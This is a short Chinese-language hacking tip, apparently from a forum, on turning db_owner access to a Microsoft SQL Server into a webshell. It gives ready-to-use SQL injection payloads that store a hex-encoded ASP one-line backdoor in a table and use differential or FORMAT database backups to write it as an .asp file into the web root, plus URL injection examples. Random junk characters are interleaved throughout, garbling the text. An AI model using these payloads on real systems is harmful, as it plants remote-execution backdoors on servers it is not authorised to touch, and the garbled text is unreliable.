DB_OWNER权限得到webshell的两点改进:! A9 V( n& d3 B
" k- |" H9 z5 B8 f4 _
减少备份文件大小,得到可执行的webshell成功率提高不少
C S( P! z8 Y. m一利用差异备份
) {8 K6 L% P8 m/ N c* [加一个参数WITH DIFFERENTIAL
8 t; E" ~9 _4 a7 u3 |5 C3 V) W W+ `* ?/ X2 V3 n* `
1
$ a; i- u5 N3 o B: x! J2
! J" i6 x# I& ]" h' I39 a2 o! ^& d- j7 I5 K
4& M$ V: r) u* j9 K) C- T- g6 Z
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
. L. i# F4 ^4 k5 @# f' \* k% S' A- ]6 Dcreate table [dbo].[xiaolu] ([cmd] [image]);
$ m3 v& _2 h2 m, x$ z; h0 r9 einsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)1 K( [5 Y d6 n) S5 _' k
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL % `. ]4 R% d8 B' k1 B! I
) t! [5 }) D6 ?0 q' s5 @二利用完全FORMAT/ h5 l: w' `& u8 @% o* ^- Q
加一个参数WITH FROMAT
: I# _7 V& g) W) V) K有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以; n( i/ \& d _3 s) i
& M' `0 \+ u* o4 V% Q% W1
4 E4 \ p( l/ L0 v/ E3 ^2
5 `1 d" b# d& |# [6 _34 J. h& Q1 h# c3 F- U
4
4 o3 D1 V, N5 r7 \( q declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
, s. g0 d, O1 {4 `3 W, f# e( lcreate table [dbo].[xiaolu] ([cmd] [image]);( l# V6 [3 [: ?" l1 F1 V1 Q
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
0 `( x. N# d& `( x7 b- e4 {declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
4 _& _* O/ G3 N* @$ N0 Z
! L$ S% ^7 p% J5 h0 A" X% C总的来说就是那么简单几句,下面以备份数据库model为例子 l- ~2 W/ D/ a) m5 \/ V
1
9 u5 f3 ?/ W. z- z6 z$ Z2 v m0 L. ?, ?1 M4 B: h m* b
1; T7 y+ W5 {* u, D
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
\0 G" [: ]% x+ c# {5 |- o: \; N2 L
2( C3 r D- p! r, {0 K0 K( z
$ g% F/ _8 K" d: D$ b* U
1
0 A; t1 @7 m8 U$ b U7 p1 `9 R% k8 E id=1;backup database model to disk='你的路径‘ with differential,format;-- . V! E6 X' s" n" V$ z. j4 L/ t. b, [
|